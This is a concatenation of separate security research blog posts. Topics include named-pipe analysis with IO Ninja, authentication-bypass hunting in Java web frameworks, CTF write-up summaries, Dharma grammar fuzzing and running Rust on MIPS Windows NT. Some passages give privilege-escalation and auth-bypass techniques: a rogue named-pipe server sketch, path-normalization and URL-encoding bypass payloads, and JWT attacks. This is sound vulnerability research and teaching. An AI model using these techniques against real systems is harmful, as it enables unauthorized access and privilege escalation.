MindShaRE: Using IO Ninja to Analyze NPFS

In this installment of our MindShaRE series, ZDI vulnerability researcher Michael DePlante describes how he uses the IO Ninja tool for reverse engineering and software analysis. According to its website, IO Ninja provides an “all-in-one terminal emulator, sniffer, and protocol analyzer.” The tool provides many options for researchers but can leave new users confused about where to begin. This blog provides a starting point for some of the most commonly used features. 


Looking at a new target can almost feel like meeting up with someone who’s selling their old car. I’m the type of person who would want to inspect the car for rust, rot, modifications, and other red flags before I waste the owner’s or my own time with a test drive. If the car isn’t super old, having an OBD reader (on-board diagnostics) may save you some time and money. After the initial inspection, a test drive can be critical to your decision. 

Much like checking out a used car, taking software for test drives as a researcher with the right tools is a wonderful way to find issues. In this blog post, I would like to highlight a tool that I have found incredibly handy to have in my lab – IO Ninja.

Lately, I have been interested in antivirus products, mainly looking for local privilege escalation vulnerabilities. After looking at several vendors including Avira, Bitdefender, ESET, Panda Security, Trend Micro, McAfee, and more, I started to notice that almost all of them utilize the Named Pipe Filesystem (NPFS). Furthermore, NPFS is used in many other product categories including virtualization, SCADA, license managers/updaters, etc.

I began doing some research and realized there were not many tools that let you locally sniff and connect to these named pipes easily in Windows. The Sysinternals suite has a tool called Pipelist and it works exactly as advertised. Pipelist can enumerate open pipes at runtime but can leave you in the dark about pipe connections that are opening and closing frequently. Another tool also in the Sysinternals suite called Process Explorer allows you to view open pipes but only shows them when you are actively monitoring a given process. IO Ninja fills the void with two great plugins it offers.

An Introduction to IO Ninja  

When you fire up IO Ninja and start a new session, you’re presented with an expansive list of plugins as shown below. I will be focusing on two of the plugins under the “File Systems” section in this blog: Pipe Monitor and Pipe Server.  

Before starting a new session, you may need to check the “Run as Administrator” box if the pipes you want to interact with require elevated privileges to read or write. You can inspect the permissions on a given pipe with the accesschk tool from the Sysinternals Suite:
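For example (a sketch; \pipe\* enumerates the ACLs of every open pipe, while the second form queries a single pipe whose name here is hypothetical):

accesschk.exe \pipe\*
accesschk.exe -v \pipe\SomePipeName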

The powerful Pipe Monitor plugin in IO Ninja allows you to record communication, as well as apply filters to the log. The Pipe Server plugin allows you to connect to the client side of a pipe. 

IO Ninja: Pipe Monitor

The following screenshot provides a look at the Pipe Monitor plugin that comes by default with IO Ninja.

In the above screenshot, I added a process filter (*chrome*) and started recording before I opened the application. You can also filter on a filename (the name of the pipe), PID, or file ID. After starting Chrome, data started flowing between several pipe instances. This is a terrific way to dynamically gather an understanding of what data is going through each pipe and when those pipes are opened and closed. I found this helpful when interacting with antivirus agents, wanting to know which pipes were opened or closed in response to certain user actions, such as performing a system scan or update. It can also be interesting to see the content going across the pipe, especially if it contains sensitive data and the pipe has a weak ACL.

It can also help a developer debug an application and find issues in real-time like unanswered pipe connections or permission issues as shown below. 

Using IO Ninja’s find text/bin feature to search for “cannot find”, I was able to identify several connections in the log below where the client side of a connection could not find the server side. In my experience, many applications make these unanswered connections out of the box.

What made this interesting was that the process updatesrv.exe, running as NT AUTHORITY\SYSTEM, tried to open the client side of a named pipe but failed with ERROR_FILE_NOT_FOUND. We can fill the void by creating our own server with the name it is looking for and then triggering the client connection by initiating an update within the user interface.

As a low privileged user, I am now able to send arbitrary data to a highly privileged process using the Pipe Server plugin. This could potentially result in a privilege escalation vulnerability, depending on how the privileged process handles the data I am sending it.
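To illustrate the idea outside of IO Ninja, here is a minimal C sketch of such a rogue pipe server (the pipe name is hypothetical, and a real target may require message-type pipes or specific security attributes):

#include <windows.h>
#include <stdio.h>

int
main(void)
{
	DWORD written;

	// Create the server end of the pipe the privileged client is
	// looking for (the name here is hypothetical)
	HANDLE pipe = CreateNamedPipeA(
		"\\\\.\\pipe\\UpdateSrvPipe",    // pipe name
		PIPE_ACCESS_DUPLEX,              // read/write
		PIPE_TYPE_BYTE | PIPE_WAIT,      // byte stream, blocking
		1,                               // one instance
		4096, 4096,                      // I/O buffer sizes
		0, NULL);                        // default timeout and ACL
	if(pipe == INVALID_HANDLE_VALUE) {
		fprintf(stderr, "CreateNamedPipeA() error : %d\n", GetLastError());
		return -1;
	}

	// Wait for the privileged client to connect (e.g. after the user
	// triggers an update), then send it attacker-controlled data
	if(ConnectNamedPipe(pipe, NULL) ||
			GetLastError() == ERROR_PIPE_CONNECTED) {
		WriteFile(pipe, "arbitrary data", 14, &written, NULL);
	}

	CloseHandle(pipe);
	return 0;
}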

IO Ninja: Pipe Server

The Pipe Server plugin is powerful as it allows you to send data to specific client connections from the server side of a pipe. The GUI in IO Ninja allows you to select which conversation you’d like to interact with by selecting from a drop-down list of Client IDs. Just like with the Pipe Monitor plugin, you can apply filters to clean up the log. Below you’ll find a visual from the Pipe Server plugin after starting the server end of a pipe and getting a few client connections.  

In the bottom right of the previous image, you can see the handy packet library. Other related IO Ninja features include a built-in hex editor, file- and script-based transmission, and packet templating via the packet template editor.

The packet template editor allows you to create packet fields and script custom actions using the Jancy scripting language. Fields are visualized in the property grid as shown above on the bottom left-hand side of the image, where they can be edited. This feature makes it significantly easier to create and modify packets when compared to just using a hex editor.

Conclusion

This post only scratches the surface of what IO Ninja can do by highlighting just two of the plugins offered. The tool is scriptable and provides an IDE that encourages users to build, extend, or modify existing plugins. The plugins are open source and available at a link listed at the end of the blog. I hope this post inspires you to take a closer look at NPFS as well as IO Ninja and the other plugins it offers.

Keep an eye out for future blogs where I will go into more detail on vulnerabilities I have found in this area. Until then, you can follow me @izobashi and the team @thezdi on Twitter for the latest in exploit techniques and security patches.

Additional information about IO Ninja can be found on their website. All of IO Ninja’s plugins are open source and available here.

Additional References

If you are interested in learning more you can also check out the following resources which I found helpful.

Microsoft - Documentation: Named Pipes

Gil Cohen - Call the plumber: You have a leak in your named pipe

0xcsandker - Offensive Windows IPC Internals 1: Named Pipes

Identity Security Authentication Vulnerability

In most cases, all you get when you land on a system is a single login page. If you want to go further and find higher-impact vulnerabilities, you have to hunt for flaws in the authentication and authorization logic, then combine them with post-auth bugs to end up with a truly satisfying vulnerability.

Here are some of the more common authentication setups:

  • Spring Security
  • Apache Shiro
  • HTTP 401 authentication in the server itself (Tomcat, Nginx, Apache)
  • Tomcat security constraints (configured in web.xml, no code required)
  • JSON Web Token

The list above is just a quick survey of the common authentication components I have personally encountered. Different components call for different, though overlapping, audit approaches.

I. Hunting for unauthenticated access

This is the first place I start: if you can walk in through an unauthenticated endpoint, there is no need to fight the authentication logic head-on.

1. Third-party components are often exposed without authentication

Applications embedded in the program, such as druid, webservice, and swagger, are frequently designed by developers as interfaces that require no permission check; some typical default paths are sketched below.
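For instance, some well-known default paths for these components (illustrative, not exhaustive):

/druid/index.html
/druid/websession.json
/swagger-ui.html
/v2/api-docs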

These third-party components also have their own history of vulnerabilities, and since they ship inside the application as jar packages, outdated versions are very common.

Example: using druid's unauthenticated console to obtain an administrator session.

2. Unauthenticated endpoints in the security framework configuration

To meet some functional requirement, developers will configure certain endpoints to be reachable without any permission check.

web.xml

Carefully reviewing every Filter, Servlet, and Listener in the configuration files can yield unexpected rewards.

spring-mvc.xml

Here, unauthenticated request handling is exposed by way of an interceptor.
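A hypothetical spring-mvc.xml fragment of this pattern (class name and paths are illustrative): an authentication interceptor is mapped over everything, but excluded paths remain reachable without authentication:

<mvc:interceptors>
    <mvc:interceptor>
        <mvc:mapping path="/**"/>
        <mvc:exclude-mapping path="/open/**"/>
        <bean class="com.example.AuthInterceptor"/>
    </mvc:interceptor>
</mvc:interceptors>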

Tomcat security configuration

Configuration classes

Apache Shiro, Spring Security, and the like also support configuring authentication through @Configuration-annotated classes, so you can hunt by following that configuration; these frameworks support file-based configuration as well, and the hunting approach is the same.

3. Combining unauthenticated endpoints with SSRF to reach localhost services that do require authentication

In multi-service deployments, services call one another. Those internal calls may require no authentication at all, may rely on statically configured credentials, or may authenticate simply by checking whether the caller's IP is 127.0.0.1. In such cases, a single SSRF vulnerability is all we need to bypass the permission checks.

A classic example is the Apache Module mod_proxy scenario bypass: SSRF CVE-2021-40438.

II. Authentication vulnerabilities in the security frameworks themselves

1. Apache Shiro

Shiro's authentication bypass vulnerabilities can, in my view, be grouped under the path normalization problems discussed below.

2. Spring Security

Under certain configurations an authentication bypass exists, for example when the configuration whitelists /**/.js.

3. Security risks in JWT

  • Sensitive information disclosure
  • Signature not verified
  • Signature algorithm can be downgraded to none
  • Signing key brute-forcing
  • Swapping an asymmetric algorithm for a symmetric one
  • Key injection (CVE-2018-0114)

JWT testing tool: https://github.com/ticarpi/jwt_tool
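Its basic invocation takes the raw token (placeholder shown; see the repository for the current option set):

python3 jwt_tool.py <JWT>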

III. Static resource access

Access to static resources such as css and js files usually requires no authentication. Developers may place the authentication logic in a Filter, and by appending a .js suffix to an existing route we can sometimes walk straight past the check, as sketched below.
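For instance (hypothetical endpoint):

GET /admin/listUsers HTTP/1.1      -> 401
GET /admin/listUsers.js HTTP/1.1   -> 200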

A question arises here: after appending the .js suffix, will the request still match its original handler class? In a Spring application it will: under the default configuration, Spring's path matching (configurePathMatch) supports matching routes with an added suffix, and toggling suffix-match mode is done by manually overriding the configurePathMatch method.

IV. Path normalization issues

1. A simple definition

When two components or applications parse, or more precisely handle, the same URI inconsistently, a path normalization problem is born.

Orange's "Breaking Parser Logic" talk at Black Hat 2018 opened up this topic, and many of the later path normalization security issues are extensions of his slides.

2. Shiro authentication bypasses

A very classic path normalization problem leading to an authentication bypass is Shiro CVE-2020-1957.

For the resource address the user requests, i.e. the URI, Shiro's parsing and Spring's parsing disagree. The * wildcard in Shiro's Ant-style matching cannot match the URI /test/admin/page/: Shiro treats the trailing slash as another path segment, so the request slips past the /test/admin/* ACL. Spring, on the other hand, considers /test/admin/page and /test/admin/page/ to be the same and serves the same resource for both.

3. CVE-2021-21982 VMware Carbon Black Workstation

An old 1-day by now. The product implements authentication with Spring Security + JWT, and two separate components process URLs: Envoy and Spring Boot.

PS: Envoy is an L7 proxy and communication bus designed for large, modern service-oriented (SOA) architectures.

Diffing the patch pinpoints the vulnerable spot: an endpoint that issues a token locally.

Accessing that endpoint directly from the outside, however, does not return a token.

After a quick look at the component's basic architecture, let's capture the traffic between Envoy and the local service:

./tcpdump -i lo -nn -s0 -w lo1.cap -v

Envoy itself acts as a request forwarder: it can match precisely on protocol, IP, port, URL path, and so on, apply very detailed routing rules, and both forward and modify requests.

URL-encoding the path is enough to slip past Envoy's forwarding rules. The PoC follows:
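The original PoC was shown as a screenshot; a hypothetical illustration of the technique:

GET /api/token HTTP/1.1     -> matched and blocked by Envoy's route rules
GET /api/%74oken HTTP/1.1   -> not matched by Envoy, decoded back to /api/token by Spring Boot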

Summary: Envoy's forwarding rules do not match the URL-encoded form, but Spring Boot understands it. The two components interpret the URL differently, and that difference is what ultimately produces the vulnerability.

4. Other

Extending the idea: whenever one or more pieces of logic process a URL, differences in how they handle encodings, wildcards, "/", ";", and the like are very likely to create security issues.

V. Apache, Nginx, Jetty, HAProxy, etc.

Chybeta has shared many of these on his Zhishi Xingqiu (Knowledge Planet):

Nginx scenario bypass, part 1: URL white spaces + Gunicorn

https://articles.zsxq.com/id_whpewmqqocrw.html

Nginx scenario bypass, part 2: trailing slash and #

https://articles.zsxq.com/id_jb6bwow4zf5p.html

Nginx scenario bypass, part 3: trailing slash and ;

https://articles.zsxq.com/id_whg6hb68xkbd.html

HAProxy scenario bypass, part 1: CVE-2021-40346

https://articles.zsxq.com/id_ftx67ig4w57u.html

Bypass via hop-by-hop headers: combined with CVE-2021-33197

https://articles.zsxq.com/id_rfsu4pm43qno.html

Squid scenario bypass, part 1: URN bypass ACL

https://articles.zsxq.com/id_ihsdxmrapasa.html

Apache Module mod_proxy scenario bypass: SSRF CVE-2021-40438

VI. Simple fuzz testing

The root causes of authentication bypasses vary, but that does not stop us from cataloguing the common bypass techniques: encoding, inserting particular characters, appending suffixes, and so on. Yuanhai (远海) once published a fuzzing dictionary for authentication bypasses (shared as an image in the original post).

VII. References

https://wx.zsxq.com/dweb2/index/group/555848225184

https://www.vmware.com/security/advisories/VMSA-2021-0005.html

https://cloud.tencent.com/developer/article/1552824

ECW 2021 - WriteUp

For the European Cyber Week CTF 2021, Thalium created some challenges in our core competencies: reverse engineering and exploitation. This blog post presents some of the write-ups.

Thalium's challenges were solved less often than the others. They were not that difficult, just a bit more unexpected. A few additional challenges designed by Thalium are:

NT objects access tracing

Draw me a map

As homework during the lockdown, I wanted to automate the attack surface analysis of a target on Windows. The main objective was to construct a view of a software architecture to highlight the attack surface (whether remote or local). The software architecture can be composed of several elements: processes, privileges, IPC, etc. Usually, software architecture analysis is done with tools that give a view at a specific point in time (ProcessHacker, WinObjEx, etc.).

SSTIC : how to setup a ctf win10 pwn user environment

Introduction This post aims to present how to easily setup a lightweight secure user pwning environment for Windows. From your binary challenge communicating with stdin/stdout, this environment provides a multi-client broker listening on a socket, redirecting it to the IO of your binary, and executing it in a jail. This environment is mainly based on the project AppJaillauncher-rs from trailofbits, with some security fixes and some tips to easily setup the RW rights to the system files from the jail.

Cyber Apocalypse 2021 5/5 - Artillery

Artillery was a web challenge of the Cyber Apocalypse 2021 CTF organized by HackTheBox. We were given the source code of the server to help us solve the challenge. This challenge was a nice opportunity to learn more about XXE vulnerabilities.

Cyber Apocalypse 2021 1/5 - PWN challenges

Thalium participated in the Cyber Apocalypse 2021 CTF organized last week by HackTheBox. It was a great success, with 4,740 teams composed of around 10,000 hackers from all over the world. Our team finished in fifth place and solved sixty of the sixty-two challenges.

This article explains how we solved each pwn challenge and what tools we used. It is written to be accessible to beginners:

Cyber Apocalypse 2021 4/5 - Discovery

One of the least solved challenges, yet probably not the most difficult one. It is a Hardware challenge, though it is significantly different from the other challenges of this category. The first thing to spot is that when starting the challenge machine, we have access to two network services:

  • an HTTP server, requesting an authentication
  • an AMQP broker, rabbitmq

Windows Memory Introspection with IceBox

Virtual Machine Introspection (VMI) is an extremely powerful technique to explore a guest OS. Acting directly on the hypervisor allows stealthy and precise control of the guest state, meaning its CPU context as well as its memory. A common use case in VMI consists of (1) setting a breakpoint on an address, (2) waiting for the break, and (3) finally reading some virtual memory. For example, to simply monitor user file-writing activity on Windows, just set a breakpoint on the NtWriteFile function in kernel land.

Getting Started with Icebox VMI

Icebox is a VMI (Virtual Machine Introspection) framework enabling you to stealthily trace and debug any kernel or user code system-wide. All Icebox source code can be found on our github page.

Try Icebox

Icebox now comes with full Python bindings enabling fast prototyping on top of VMI, whether you want to trace a user process or inspect the kernel internals. The core itself is in C++ and exposes most of its public functions into an icebox Python 3 module.

Introduction to Dharma - Part 1

While targeting Adobe Acrobat JavaScript APIs, we were not only focusing on performance and the number of cases generated per second, but also on effective generation of valid inputs that cover different functionalities and uncover new vulnerabilities.

Obtaining inputs from mutational input generators helped us quickly produce random inputs; however, due to the randomness of the mutations, the great majority of those inputs were invalid.

So, we utilized a well-known grammar-based input generator called Dharma to produce inputs that are semantically reasonable and follow the syntactic rules of JavaScript.

In this blog post, we will explain what Dharma is, how to set it up and finally demonstrate how to use it to generate valid Adobe Acrobat JavaScript API calls which can be wrapped in PDF file format.


So, what is Dharma?

Dharma was created by Mozilla in 2015. It's a tool used to create test cases for fuzzing of structured text inputs, such as markup and script. Dharma takes a custom high-level grammar format as input and produces random well-formed test cases as output.

Dharma can be installed from the following GitHub repo.


Why use Dharma?

By using Dharma, a fuzzer can generate inputs that are valid according to the grammar's requirements. To generate an input with Dharma, the input model must be specified, and it would be difficult to write grammar files for a model that is proprietary, unknown, or very complex.

However, we do have knowledge of the APIs and objects we are targeting, thanks to the publicly available JavaScript API documentation provided by Adobe.


How to use Dharma?

Using Dharma is straightforward: it takes a grammar file with the .dg extension and starts generating random inputs based on the grammar provided.

A grammar file generally contains three sections:

  1. Value

  2. Variable

  3. Variance

Note that the Variable section is not mandatory. Each section has its own purpose and specifications.

The syntax to declare a section: %section% := section

  • The "value" section is where we define values that are interchangeable - think of it as an OR/SWITCH.

a value can be referenced in the grammar file using +value+, for example +cName+.

  • The "variable" section is where we define variables to be used as a context to be used in generating different code.

a variable can be referenced from the value section by using two exclamation marks

  • The "variance" section is where we put everything together.

if we run the previous example of the three sections, one of the generated files will be similar to the following JS code:

Building Grammar Files

In this section we'll walk through an example of how to build a grammar file based on a real-life scenario. We will build a grammar file for the Thermometer object from Adobe's JavaScript documentation.

%section% := variable

The Thermometer object is referenced through "app.thermometer", which is the first thing we need to implement. The easiest way to get a reference to the Thermometer object is from the app object (app.thermometer):
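A sketch of what that variable definition might look like (following the +value+/!variable! conventions above):

thermometer :=
    @thermometer@ = app.thermometer;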

%section% := value

Looking at the documentation of the Thermometer object, we can see that it has four properties:

We need to assign values to these properties based on their types.

In this case, the cancelled property is a boolean, duration is a number, text is a string, and value is a number. That said, we'll have to implement getters and setters for these properties. The setter implementation should look similar to the following:
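A sketch of those setters, using helpers from common.dg (mentioned below):

thermometer_setters :=
    !thermometer!.value = +common:number+;
    !thermometer!.text = "+common:character+";
    !thermometer!.duration = +common:number+;
    !thermometer!.cancelled = +common:bool+;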

Now that we have implemented setters for the properties, Dharma will pick a random setter definition from the defined thermometer_setters.

For the value property, it will set a random number using +common:number+, a random character for the text property using +common:character+, a random number from 0 to 10000 for the duration property and a Boolean value for the cancelled property using +common:bool+.

Those values were referenced from a grammar file shipped with dharma called common.dg.

We're now done with the setters; next up is implementing the getters, which is fairly easy. We can create a value holding all the properties, and then another value that picks a random property from thermometer_properties:
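A sketch (value names hypothetical):

thermometer_properties :=
    value
    text
    duration
    cancelled

thermometer_getters :=
    var x+common:digit+ = !thermometer!.+thermometer_properties+;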

In the above grammar we used x+common:digit+ to generate random JavaScript variable names to store the property values in, for example x1, x2, x3, etc.

We're officially done with the properties. Next we'll have to implement the methods. The Thermometer object has two methods - begin and end. Luckily, these two functions do not require any arguments:
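A sketch, following the same conventions:

thermometer_methods :=
    !thermometer!.begin();
    !thermometer!.end();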

We now have everything implemented. One last thing we need to implement in the value section is the wrapper. The wrapper simply wraps the generated code in a try/catch:
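For instance (a sketch):

wrapper :=
    try { +thermometer_setters+ } catch (e) {}
    try { +thermometer_getters+ } catch (e) {}
    try { +thermometer_methods+ } catch (e) {}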

Finally the variance section - which invokes the wrapper from the main:

%section% := variance
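A minimal sketch of that main:

main :=
    +wrapper+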

Putting it all together:

Running our grammar file generates the following output:

The generated JS code can then be embedded into PDF files for testing. Or we can dump the generated code to a JS file by using ">>" from the command line.

Now let's move on to a more complex example - building a grammar file for the spell object.

We will use the same methodology we used above, starting with implementing getters/setters for the properties followed by implementing the methods. Looking at the documentation of the spell object properties:

%section% := value

Note that we will constantly use +fuzzlogics+ keyword, which is a reference from another grammar file that our fuzzer will use to place some random values.

In this case, we'll make the getter/setter implementation simpler. We'll have the setter set random values to any properties regardless of the type. The getter is almost the same as the example above:

Now we're going to implement the methods. To avoid spoiling the fun for you, we'll not implement all the methods in the spell object, just a few for demonstration purposes :)

These are all the methods of the spell object. Each method takes a certain number of arguments with different types, so we need a value for each method. Let's start with the spell.addDictionary() arguments:

Looking at the addDictionary method, it takes three arguments: cFile, cName, and bShow. The last argument (bShow) is optional, so we implemented two logics for the addDictionary arguments to cover as many scenarios as we can: one with all three arguments and another with only two, since the last one is optional.

For the cFile argument, we reference an ASCII Unicode value from fuzzlogics.dg (the grammar file we custom-built for this purpose).
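A sketch of those two argument logics (helper names hypothetical):

addDictionary_args :=
    "+fuzzlogics+", "+cName+", +common:bool+
    "+fuzzlogics+", "+cName+"

spell_addDictionary :=
    spell.addDictionary(+addDictionary_args+);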

Now let's implement the spell.check() arguments.

The spell.check() function takes two optional arguments, aDomain and aDictionary, so we can pass aDomain only, aDictionary only, both, or no arguments at all.

The first logic, "{}", passes no arguments; the second passes both aDictionary and aDomain; the third passes only aDomain; the last passes only aDictionary.
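A sketch of the four logics, assuming the optional arguments are passed as an object literal (helper names hypothetical):

check_args :=
    {}
    { aDomain: +fuzzlogics+, aDictionary: +fuzzlogics+ }
    { aDomain: +fuzzlogics+ }
    { aDictionary: +fuzzlogics+ }

spell_check :=
    spell.check(+check_args+);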

The same methodology is used for the rest of the methods, so we're not going to cover all available methods. The last thing we need to implement is the wrapper:

As we mentioned earlier, the wrapper is used to wrap everything between a try/catch so that any error would be suppressed. Finally, the variance section:

In the next part we will expand further into Dharma, focusing on a specific case study where Dharma was essential to the process of vulnerability discovery. Hopefully this introduction catches you up to speed with grammar fuzzing and its inner workings.

As always, happy hunting :)

Rust on MIPS64 Windows NT 4.0

Introduction

Some part of me has always been fascinated with coercing code to run in weird places. I scratch this itch a lot with my security research projects. These often lead me to writing shellcode to run in kernels or embedded hardware, sometimes with the only way being through an existing bug.

For those not familiar, shellcode is honestly hard to describe. I don’t know if there’s a very formal definition, but I’d describe it as code which can be run in an environment without any external dependencies. This often means it’s written directly in assembly, and directly interfaces with the system using syscalls. Usually the code can be relocated and often is represented as a flat image rather than a normal executable with multiple sections.

To me, this is extra fun as it’s effectively like operating systems development. You’re working in an environment where you need to bring most of what you need along with you. You probably want to minimize the dependencies you have on the system and libraries to increase compatibility and flexibility with the environments you run. You might have to bring your own allocator, make your own syscalls, maybe even make a scheduler if you are really trying to minimize impact.

Some of these things may seem silly, but when it comes to bypassing anti-viruses, exploit detection tools, and even mitigations, often the easiest thing to do is just avoid the common APIs that are hooked and monitored.

Streams

Before we get into it, it’s important to note that this work has been done over 3 different live streams on my Twitch! You can find these archived on my YouTube channel. Everything covered in this blog can be viewed as it happened in real time, mistakes, debugging, and all!

The 3 videos in question are:

Day 1 - Getting Rust running on Windows NT 4.0 MIPS64

Day 2 - Adding memory management and threading to our Rust on Windows NT MIPS

Day 3 - Causing NT 4.0 MIPS to bluescreen without even trying

Source

This project has spun off 3 open-source GitHub repos, one for the Rust on NT MIPS project in general, another for converting ELFs to flat images, and a final one for parsing .DBG symbol files for applying symbols to Binary Ninja or whatever tool you want symbols in! I’ve also documented the commit hashes for the repos as of this writing if things have changed since you’ve read this!

Rust on NT MIPS - 2028568

ELF loader - 30c77ca

DBG COFF parser - b7bcdbb

Don’t forget to follow me on socials and like and subscribe of course. Maybe eventually I can do research and education full time!~ Oh, also follow me on my Twitter @gamozolabs

MIPS on Windows NT

Windows NT actually has a pretty fascinating history of architecture support. It supported x86 as we know and love, but additionally it supported MIPS, Alpha, and PowerPC. If you include the embedded versions of Windows there's support for some even more exotic architectures.

MIPS is one of my favorite architectures as the simplicity makes it really fun to develop emulators for. As someone who writes a lot of emulators, it’s often one of my first targets during development, as I know it can be implemented in less than a day of work. Finding out that MIPS NT can run in QEMU was quite exciting for me. The first time I played around with this was maybe ~5 years ago, but recently I thought it’d be a fun project to demonstrate harnessing of targets for fuzzing. Not only does it have some hard problems in harnessing, as there are almost no existing tools for working with MIPS NT binaries, but it also leads us to some fun future projects where custom emulators can come into the picture!

There’s actually a fantastic series by Raymond Chen which I highly recommend you check out here.

There’s actually a few of these series by Raymond for various architectures on NT. They definitely don’t pull punches on details, definitely a fantastic read!

Running Windows NT 4.0 MIPS in QEMU

Getting NT 4.0 running in QEMU honestly isn't too difficult. QEMU already supports the magnum machine, which runs on an R4000 MIPS processor, the first 64-bit MIPS processor, implementing the MIPS III ISA. Unfortunately, out of the box it won't quite run, as you need a BIOS/bootloader capable of booting Windows (maybe it's the video BIOS, I don't know). You can find this here. Simply extract the file, and rename NTPROM.RAW to mipsel_bios.bin.

Other than that, QEMU will be able to just run NT 4.0 out of the box. There’s a bit of configuration you need to do in the BIOS to get it to detect your CD, and you need to configure your MAC address otherwise networking in NT doesn’t seem to work beyond a DHCP lease. Anyways, you can find more details about getting MIPS NT 4.0 running in QEMU here.

I also cover the process I use, and include my run.sh script here.

#!/bin/sh

ISO="winnt40wks_sp1_en.iso"
#ISO="./Microsoft Visual C++ 4.0a RISC Edition for MIPS (ISO)/VCPP-4.00-RISC-MIPS.iso"

qemu-system-mips64el \
    -M magnum \
    -cpu VR5432 \
    -m 128 \
    -net nic \
    -net user,hostfwd=tcp::5555-:42069 \
    -global ds1225y.filename=nvram \
    -global ds1225y.size=8200 \
    -L . \
    -hda nt4.qcow2 \
    -cdrom "$ISO"

Windows NT 4.0 running in QEMU MIPS

Getting code running on Windows NT 4.0

Surprisingly, a decent enough environment for development is readily available for NT 4.0 on MIPS. This includes symbols (included under SUPPORT/DEBUG/MIPS/SYMBOLS on the original ISO), as well as debugging tools such as ntsd, cdb and mipskd (command-line versions of the WinDbg command interface you may be familiar with), and the cherry on top is a fully working Visual Studio 4.0 install that will work right inside the MIPS guest!

With Visual Studio 4.0 we can use both the full IDE experience for building projects, but also the command line cl.exe compiler and nmake, my preferred Windows development experience. I did however use VS4 for the editor as I’m not using 1996 notepad.exe for writing code!

Unless you’re doing something really fancy, you’ll be surprised to find much of the NT APIs just work out of the box on NT4. This includes your standard way of interacting with sockets, threads, process manipulation, etc. A few years ago I wrote a snapshotting tool that used all the APIs that I would in a modern tool to dump virtual memory regions, read them, and read register contexts. It’s pretty neat!

Nevertheless, if you’re writing C or C++, other than maybe forgetting about variables having to be declared at the start of a scope, or not using your bleeding edge Windows 10 APIs, it’s really no different from modern Windows development. At least… for low level projects.

Rust and Me

After about ~10 years of writing -ansi -pedantic C, where I followed all the old fashioned rules of declaring variables at the start of scopes, verbose syntax, etc, I never would have thought I would find myself writing in a higher-level language. I dabbled in C++ but I really didn’t like the abstractions and confusion it brought, although that was arguably when I was a bit less experienced.

Nevertheless, I found myself absolutely falling in love with Rust. This was a pretty big deal for me as I have very strong requirements about understanding exactly what sort of assembly is generated from the code I write. I spend a lot of time optimizing and squeezing every bit of performance out of my code, and not having this would ruin a language for me. Something about Rust and its model of abstractions (traits) makes it actually pretty obvious what code will be generated, even for things like generics.

The first project I did in Rust was porting my hobby OS to it. Definitely a “thrown into the deep end” style project, but if Rust wasn’t suitable for operating systems development, it definitely wasn’t going to be a language I personally would want to invest in. However… it honestly worked great. After reading the Rust book, I was able to port my OS which consisted of a small hypervisor, 10gbit networking stack, and some fancy memory management, in less than a week.

Anyways, rant aside, as a low-level optimization nerd, there was nothing about Rust, even in 2016, that raised red flags about being able to replace all of my C in it. Of course, I have many complaints and many things I would change or want added to Rust, but that’s going to be the case with any language… I’m picky.

Rust on MIPS NT 4.0

Well, I do all of my projects in Rust now. Even little scripts I'd usually write in Python I often find myself grabbing Rust for. I'm comfortable using Rust for pretty much any project at this point, so I decided that for a long-ish term stream project (ultimately a snapshot fuzzer for NT), I would want to do it in Rust.

The very first thought that comes to mind is to just build a MIPS executable from Rust, and just… run it. Well, that would be great, but unfortunately there were a few hiccups.

Rust on weird targets

Rust actually has pretty good support for weird targets. I mean, I guess we’re really just relying on, or limited by cough, LLVM. Not only can you simply pick your target by the --target triple argument to Rust and Cargo, but also when you really need control you can define a target specification. This gives you a large amount of control about the code generated.

For example:

pleb@gamey ~ $ rustc -Z unstable-options --print target-spec-json

Will give you the JSON spec for my native system, x86_64-unknown-linux-gnu

{
  "arch": "x86_64",
  "cpu": "x86-64",
  "crt-static-respected": true,
  "data-layout": "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128",
  "dynamic-linking": true,
  "env": "gnu",
  "executables": true,
  "has-elf-tls": true,
  "has-rpath": true,
  "is-builtin": true,
  "llvm-target": "x86_64-unknown-linux-gnu",
  "max-atomic-width": 64,
  "os": "linux",
  "position-independent-executables": true,
  "pre-link-args": {
    "gcc": [
      "-m64"
    ]
  },
  "relro-level": "full",
  "stack-probes": {
    "kind": "call"
  },
  "supported-sanitizers": [
    "address",
    "cfi",
    "leak",
    "memory",
    "thread"
  ],
  "target-family": [
    "unix"
  ],
  "target-pointer-width": "64"
}

As you can see, there’s a lot of control you have here. There’s plenty more options than just in this JSON as well. You can adjust your ABIs, data layout, calling conventions, output binary types, stack probes, atomic support, and so many more. This JSON can be modified as you need and you can then pass in the JSON as --target <your target json.json> to Rust, and it “just works”.

I’ve used this to generate code for targets Rust doesn’t support, like Android on MIPS (okay there’s maybe a bit of a pattern to my projects here).

Back to Rust on MIPS NT

Anyways, back to Rust on MIPS NT. Lets just make a custom spec and get LLVM to generate us a nice portable executable (PE, the .exe format of Windows)!

Should be easy!

Well… after about ~4-6 hours of tinkering. No. No it is not. In fact, we ran into an LLVM bug.

It took us some time (well, Twitch chat eventually read the LLVM code instead of me guessing) to find that the correct target triple if we wanted to get LLVM to generate a PE for MIPS would be mips64el-pc-windows-msvccoff. It’s a weird triple (mainly the coff suffix), but this is the only path we were able to find which would cause LLVM to attempt to generate a PE for MIPS. It definitely seems a bit biased towards making an ELF, but this triple indeed works…

It works at getting LLVM to try to emit a PE, but unfortunately this feature is not implemented. Specifically, inside LLVM they will generate the MIPS code, and then attempt to create the PE by calling createMCObjectStreamer. This function doesn’t actually check any of the function pointers before invoking them, and it turns out that the COFF streamer defaults to NULL, and for MIPS it’s not implemented.

Thus… we get a friendly jump to NULL:

LLVM crash backtrace in GDB

Can we add support?

The obvious answer is to quickly take the generic implementation of PE generation in LLVM and make it work for MIPS and upstream it. Well, after a deep 30 second analysis of LLVM code, it looks like this would be more work than I wanted to invest, and after all the issues up to this point my concerns were that it wouldn’t be the end of the problems.

I guess we have ELFs

Well, that leaves us with really one format that LLVM will generate MIPS for us, and that’s ELFs. Luckily, I’ve written my fair share of ELF loaders, and I decided the best way to go would simply be to flatten the ELF into an in-memory representation and make my own file format that’s easy to write a loader for.

You might think to just use a linker script for this, or to do some magic objcopy to rip out code, but unfortunately both of these have limitations. Linker scripts are fail-open, meaning if you do not specify what happens with a section, it will just "silently" be added wherever the linker would have put it by default. There is (to my knowledge) no strict mode, which means if Rust or LLVM decides to emit some section name you are not expecting, you might end up with code not being laid out as you expect.

objcopy cannot output zero-initialized BSS sections as they would be represented in-memory, so once again, this leads to an unexpected section popping up and breaking the model you expected.

Of course, with enough effort and being picky you can get a linker script to output whatever format you want, but honestly they kinda just suck to write.

